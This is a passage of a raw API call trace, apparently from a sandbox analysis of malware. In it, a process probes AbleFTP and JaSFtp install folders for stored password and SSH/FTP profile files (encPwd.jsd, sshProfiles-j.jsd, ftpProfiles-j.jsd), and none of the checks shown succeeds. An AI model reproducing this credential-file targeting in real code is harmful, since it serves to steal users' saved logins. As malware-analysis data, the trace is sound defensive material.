0x5b0000 [0114.177] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.178] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.178] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP11\\encPwd.jsd") returned 0 [0114.178] GetProcessHeap () returned 0x5b0000 [0114.178] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.178] GetProcessHeap () returned 0x5b0000 [0114.178] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.179] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.180] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP11\\data\\settings\\sshProfiles-j.jsd") returned 64 [0114.180] GetProcessHeap () returned 0x5b0000 [0114.180] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x84) returned 0x5c9390 [0114.180] GetProcessHeap () returned 0x5b0000 [0114.180] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.181] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.181] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP11\\data\\settings\\sshProfiles-j.jsd") returned 0 [0114.181] GetProcessHeap () returned 0x5b0000 [0114.182] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.182] GetProcessHeap () returned 0x5b0000 [0114.182] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.182] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.183] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP11\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0114.183] GetProcessHeap () returned 0x5b0000 [0114.183] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x84) returned 0x5c9390 [0114.183] GetProcessHeap () returned 0x5b0000 [0114.183] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.184] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.184] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP11\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0114.185] GetProcessHeap () returned 0x5b0000 [0114.185] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.185] GetProcessHeap () returned 0x5b0000 [0114.185] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f64) returned 0x5cb930 [0114.185] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.186] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\encPwd.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP12\\encPwd.jsd") returned 43 [0114.186] GetProcessHeap () returned 0x5b0000 [0114.186] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x5a) returned 0x5c9390 [0114.186] GetProcessHeap () returned 0x5b0000 [0114.187] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.187] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.187] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP12\\encPwd.jsd") returned 0 [0114.188] GetProcessHeap () returned 0x5b0000 [0114.188] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.188] GetProcessHeap () returned 0x5b0000 [0114.188] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.189] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.189] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP12\\data\\settings\\sshProfiles-j.jsd") returned 64 [0114.189] GetProcessHeap () returned 0x5b0000 [0114.189] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x84) returned 0x5c9390 [0114.189] GetProcessHeap () returned 0x5b0000 [0114.190] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.190] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.191] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP12\\data\\settings\\sshProfiles-j.jsd") returned 0 [0114.191] GetProcessHeap () returned 0x5b0000 [0114.191] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.191] GetProcessHeap () returned 0x5b0000 [0114.191] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.192] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.193] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP12\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0114.193] GetProcessHeap () returned 0x5b0000 [0114.193] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x84) returned 0x5c9390 [0114.193] GetProcessHeap () returned 0x5b0000 [0114.193] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.194] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.194] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP12\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0114.194] GetProcessHeap () returned 0x5b0000 [0114.195] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.195] GetProcessHeap () returned 0x5b0000 [0114.195] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f64) returned 0x5cb930 [0114.195] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.196] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\encPwd.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP13\\encPwd.jsd") returned 43 [0114.196] GetProcessHeap () returned 0x5b0000 [0114.196] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x5a) returned 0x5c9390 [0114.196] GetProcessHeap () returned 0x5b0000 [0114.197] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.198] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.198] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP13\\encPwd.jsd") returned 0 [0114.198] GetProcessHeap () returned 0x5b0000 [0114.198] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.198] GetProcessHeap () returned 0x5b0000 [0114.198] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.199] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.200] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP13\\data\\settings\\sshProfiles-j.jsd") returned 64 [0114.200] GetProcessHeap () returned 0x5b0000 [0114.200] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x84) returned 0x5c9390 [0114.200] GetProcessHeap () returned 0x5b0000 [0114.200] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.201] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.201] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP13\\data\\settings\\sshProfiles-j.jsd") returned 0 [0114.202] GetProcessHeap () returned 0x5b0000 [0114.202] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.202] GetProcessHeap () returned 0x5b0000 [0114.202] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.203] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.203] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP13\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0114.203] GetProcessHeap () returned 0x5b0000 [0114.203] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x84) returned 0x5c9390 [0114.203] GetProcessHeap () returned 0x5b0000 [0114.204] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.205] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.205] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP13\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0114.205] GetProcessHeap () returned 0x5b0000 [0114.205] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.205] GetProcessHeap () returned 0x5b0000 [0114.205] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f64) returned 0x5cb930 [0114.206] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.207] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\encPwd.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP14\\encPwd.jsd") returned 43 [0114.207] GetProcessHeap () returned 0x5b0000 [0114.234] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x5a) returned 0x5c9390 [0114.234] GetProcessHeap () returned 0x5b0000 [0114.234] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.235] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.236] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP14\\encPwd.jsd") returned 0 [0114.236] GetProcessHeap () returned 0x5b0000 [0114.236] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.237] GetProcessHeap () returned 0x5b0000 [0114.237] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.237] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.238] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP14\\data\\settings\\sshProfiles-j.jsd") returned 64 [0114.238] GetProcessHeap () returned 0x5b0000 [0114.238] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x84) returned 0x5c9390 [0114.239] GetProcessHeap () returned 0x5b0000 [0114.239] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.240] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.240] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP14\\data\\settings\\sshProfiles-j.jsd") returned 0 [0114.240] GetProcessHeap () returned 0x5b0000 [0114.241] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.241] GetProcessHeap () returned 0x5b0000 [0114.241] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.241] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.242] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP14\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0114.242] GetProcessHeap () returned 0x5b0000 [0114.242] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x84) returned 0x5c9390 [0114.242] GetProcessHeap () returned 0x5b0000 [0114.243] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.243] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.244] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP14\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0114.244] GetProcessHeap () returned 0x5b0000 [0114.244] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.244] GetProcessHeap () returned 0x5b0000 [0114.244] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f64) returned 0x5cb930 [0114.245] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.246] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\encPwd.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp7\\encPwd.jsd") returned 41 [0114.246] GetProcessHeap () returned 0x5b0000 [0114.246] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x56) returned 0x5c9390 [0114.246] GetProcessHeap () returned 0x5b0000 [0114.246] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.247] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.247] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp7\\encPwd.jsd") returned 0 [0114.247] GetProcessHeap () returned 0x5b0000 [0114.248] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.248] GetProcessHeap () returned 0x5b0000 [0114.248] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.248] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.249] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp7\\data\\settings\\sshProfiles-j.jsd") returned 62 [0114.249] GetProcessHeap () returned 0x5b0000 [0114.249] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x80) returned 0x5c9390 [0114.249] GetProcessHeap () returned 0x5b0000 [0114.250] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.250] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.251] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp7\\data\\settings\\sshProfiles-j.jsd") returned 0 [0114.251] GetProcessHeap () returned 0x5b0000 [0114.251] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.251] GetProcessHeap () returned 0x5b0000 [0114.251] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.252] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.252] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp7\\data\\settings\\ftpProfiles-j.jsd") returned 62 [0114.252] GetProcessHeap () returned 0x5b0000 [0114.253] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x80) returned 0x5c9390 [0114.253] GetProcessHeap () returned 0x5b0000 [0114.253] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.253] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.254] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp7\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0114.254] GetProcessHeap () returned 0x5b0000 [0114.254] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.254] GetProcessHeap () returned 0x5b0000 [0114.254] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f64) returned 0x5cb930 [0114.255] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.256] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\encPwd.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp8\\encPwd.jsd") returned 41 [0114.256] GetProcessHeap () returned 0x5b0000 [0114.256] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x56) returned 0x5c9390 [0114.256] GetProcessHeap () returned 0x5b0000 [0114.256] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.257] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.257] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp8\\encPwd.jsd") returned 0 [0114.257] GetProcessHeap () returned 0x5b0000 [0114.257] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.257] GetProcessHeap () returned 0x5b0000 [0114.258] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.258] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.259] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp8\\data\\settings\\sshProfiles-j.jsd") returned 62 [0114.259] GetProcessHeap () returned 0x5b0000 [0114.259] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x80) returned 0x5c9390 [0114.259] GetProcessHeap () returned 0x5b0000 [0114.259] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.260] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.260] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp8\\data\\settings\\sshProfiles-j.jsd") returned 0 [0114.260] GetProcessHeap () returned 0x5b0000 [0114.261] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.261] GetProcessHeap () returned 0x5b0000 [0114.261] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.261] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.262] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp8\\data\\settings\\ftpProfiles-j.jsd") returned 62 [0114.262] GetProcessHeap () returned 0x5b0000 [0114.262] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x80) returned 0x5c9390 [0114.262] GetProcessHeap () returned 0x5b0000 [0114.262] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.263] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.263] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp8\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0114.263] GetProcessHeap () returned 0x5b0000 [0114.263] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.264] GetProcessHeap () returned 0x5b0000 [0114.264] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f64) returned 0x5cb930 [0114.264] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.265] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\encPwd.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp9\\encPwd.jsd") returned 41 [0114.265] GetProcessHeap () returned 0x5b0000 [0114.265] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x56) returned 0x5c9390 [0114.265] GetProcessHeap () returned 0x5b0000 [0114.265] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.266] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.266] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp9\\encPwd.jsd") returned 0 [0114.266] GetProcessHeap () returned 0x5b0000 [0114.266] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.266] GetProcessHeap () returned 0x5b0000 [0114.266] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.267] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.267] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp9\\data\\settings\\sshProfiles-j.jsd") returned 62 [0114.267] GetProcessHeap () returned 0x5b0000 [0114.268] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x80) returned 0x5c9390 [0114.268] GetProcessHeap () returned 0x5b0000 [0114.268] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.268] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.269] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp9\\data\\settings\\sshProfiles-j.jsd") returned 0 [0114.269] GetProcessHeap () returned 0x5b0000 [0114.269] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.269] GetProcessHeap () returned 0x5b0000 [0114.269] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.273] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.274] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp9\\data\\settings\\ftpProfiles-j.jsd") returned 62 [0114.274] GetProcessHeap () returned 0x5b0000 [0114.274] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x80) returned 0x5c9390 [0114.274] GetProcessHeap () returned 0x5b0000 [0114.274] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.275] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.275] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp9\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0114.275] GetProcessHeap () returned 0x5b0000 [0114.276] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.276] GetProcessHeap () returned 0x5b0000 [0114.276] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f64) returned 0x5cb930 [0114.276] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.277] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\encPwd.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp10\\encPwd.jsd") returned 42 [0114.277] GetProcessHeap () returned 0x5b0000 [0114.277] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x58) returned 0x5c9390 [0114.277] GetProcessHeap () returned 0x5b0000 [0114.277] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.278] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.278] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp10\\encPwd.jsd") returned 0 [0114.278] GetProcessHeap () returned 0x5b0000 [0114.278] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.278] GetProcessHeap () returned 0x5b0000 [0114.279] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.279] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.280] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp10\\data\\settings\\sshProfiles-j.jsd") returned 63 [0114.280] GetProcessHeap () returned 0x5b0000 [0114.280] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x82) returned 0x5c9390 [0114.280] GetProcessHeap () returned 0x5b0000 [0114.280] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.281] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.281] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp10\\data\\settings\\sshProfiles-j.jsd") returned 0 [0114.281] GetProcessHeap () returned 0x5b0000 [0114.282] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.282] GetProcessHeap () returned 0x5b0000 [0114.282] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.283] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.283] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp10\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0114.283] GetProcessHeap () returned 0x5b0000 [0114.283] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x82) returned 0x5c9390 [0114.283] GetProcessHeap () returned 0x5b0000 [0114.284] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.284] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.284] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp10\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0114.285] GetProcessHeap () returned 0x5b0000 [0114.285] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.285] GetProcessHeap () returned 0x5b0000 [0114.285] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f64) returned 0x5cb930 [0114.286] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.286] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\encPwd.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp11\\encPwd.jsd") returned 42 [0114.286] GetProcessHeap () returned 0x5b0000 [0114.286] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x58) returned 0x5c9390 [0114.286] GetProcessHeap () returned 0x5b0000 [0114.287] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.287] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.287] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp11\\encPwd.jsd") returned 0 [0114.288] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.288] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.289] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.289] 